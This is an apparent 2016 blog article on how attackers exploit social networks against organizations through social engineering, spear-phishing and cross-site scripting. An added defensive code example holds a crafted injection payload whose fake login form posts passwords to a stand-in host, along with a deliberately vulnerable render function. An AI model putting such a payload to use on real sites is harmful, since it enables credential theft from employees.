Safety implications of social networking

Jul 11, 2016, 19:35

Kate Yeng

With the boom in corporate use of social networking comes a serious danger: information can be exploited by aggregating data from different social networks. Attackers can use various data mining processes to target organizations. Facebook, LinkedIn and Twitter provide details on an individual, including contact information, employment details, financial details, and much more. A potential attacker can easily harvest information on organizational structure, potential clients and associates, company operations, and even the business infrastructure of different divisions, just by following the profile changes or status updates of the targeted individual.

For the most part, an attacker exploits the social engineering element of trust when initiating a social networking attack. People tend to trust information fed to them through social networking sites and applications, and even end up befriending strangers. The attacker can easily exploit this inherent trust to target an employee, gain access to company information, and use it in more than one way. The average user doesn’t really anticipate social engineering attacks and ends up as an easy victim of an attacker they supposedly trust.

Furthermore, it’s very easy to fake or create identities on a social networking platform. Such fake identities can easily be used to obtain the digital signatures of an employee and to approach other members of the organization. Once the penetration is done, it can very conveniently be used for other malicious activities. A potential attacker can propagate malware through an organization’s network in the form of viruses or Trojans. Employees can be easily coerced by social engineering tactics into opening or downloading infected files and attachments. Most often, links are posted on sites which require users to install plug-ins in order to view the available content. Most users do so without thinking much, and easily expose the vulnerabilities of an organization that has no security policy against installation. All these attacks lead to the installation of malware on a computer which is highly likely to be part of an organization, and which can be used for data theft and misuse of information.

Another mode through which sensitive information such as usernames, passwords, credit card details, etc., can be acquired is phishing. Phishing in the corporate sense is known as Spear-Phishing or Whaling. It is one of the most popular attack methods used by web criminals and hackers. It is easy to use, and attackers consider it the best choice because of its high success rate despite its common use. As mentioned earlier, social networking sites and applications provide information which is easily trusted by ignorant individuals. They are not aware of the existing threats and fall easily for the malware attacks concealed within these platforms. Powerful attacks can be launched against organizations, such as duplicating a company’s website portals. After sufficient trust is gained within the organization’s network of employees, the attack is launched by drawing employees to the phishing site. Because the fake website resembles the actual company page, employees do not hesitate to provide their employment credentials, which are sent directly to the attacker’s computer.

A more effective method of infiltrating internal organization networks is the exploitation of cross-site scripting vulnerabilities coupled with the existing attack methods. In this method, the attacker needs only a link instead of a phishing website, with fake login forms placed within a webpage of the organization’s actual network. The method is less suspicious because the distributed link points to the actual webpage of the company, and therefore proves more efficient and reliable for the attacker. To sum up, a potential attacker can easily gather information by using legitimate actions within social networking applications, without using any traditional, legally jeopardizing attack methods. The acquired data provides an efficient and reliable way to launch a much more organized attack and compromise the position of the targeted organization.
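The fake-login-form scenario described above depends on a page echoing a link parameter into its HTML without encoding it. The added example below (not from the original article; the page template, the `.example` hosts and all function names are assumptions, and the sample parameter is constructed) shows that flaw beside the output-encoded version, response headers that restrict where forms may post, and a check that flags forms leaving the site's origin.

```javascript
// Constructed sample: a value carried in a link to the real company page.
// It holds markup for a look-alike login form that posts to another host.
const CRAFTED_PARAM =
  '"><form action="https://collector.example/login" method="post">' +
  'Password: <input type="password" name="p"></form>';

// Vulnerable: the parameter is concatenated into the HTML unchanged.
function renderVulnerable(q) {
  return `<h1>Results for "${q}"</h1>`;
}

// Hardened, step 1: encode the five HTML-significant characters on output.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

function renderHardened(q) {
  return `<h1>Results for "${escapeHtml(q)}"</h1>`;
}

// Hardened, step 2: headers that limit the damage if an encoding gap remains.
// form-action 'self' stops forms on the page from posting to other origins.
function securityHeaders() {
  return {
    'Content-Security-Policy':
      "default-src 'self'; script-src 'self'; form-action 'self'; base-uri 'none'",
    'X-Content-Type-Options': 'nosniff',
  };
}

// Review/test check: list form targets that leave the site's own origin.
function offOriginFormActions(html, origin) {
  const found = [];
  const re = /<form\b[^>]*\baction\s*=\s*["']?([^"'\s>]+)/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    let target;
    try { target = new URL(m[1], origin); } catch { continue; }
    if (target.origin !== origin) found.push(target.href);
  }
  return found;
}
```

Running `offOriginFormActions` over rendered pages in a test suite or a crawler of the company's own site gives a cheap regression check for this class of injected form.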

Protection against these threats requires an organization to formulate a strategy which covers all aspects of social networking use for personal or professional purposes. The policies laid out in the strategy should spread awareness among employees, keeping them up to date on the possible threats, the resulting risks, and the implications of the control measures. Company exposure to social networking sites should be constantly monitored, and any information exchanges performed through externally hosted sites or applications, or through the company’s internal network, should be kept in check as well. Companies today should be aware that sensitive internal information is crucial to their competitors and, if they lay hands on it, can have serious, even fatal, strategic implications. It is very easy to gather information using a social networking platform, and the fact that abundant information is available effortlessly and legally to competitors should not be underestimated.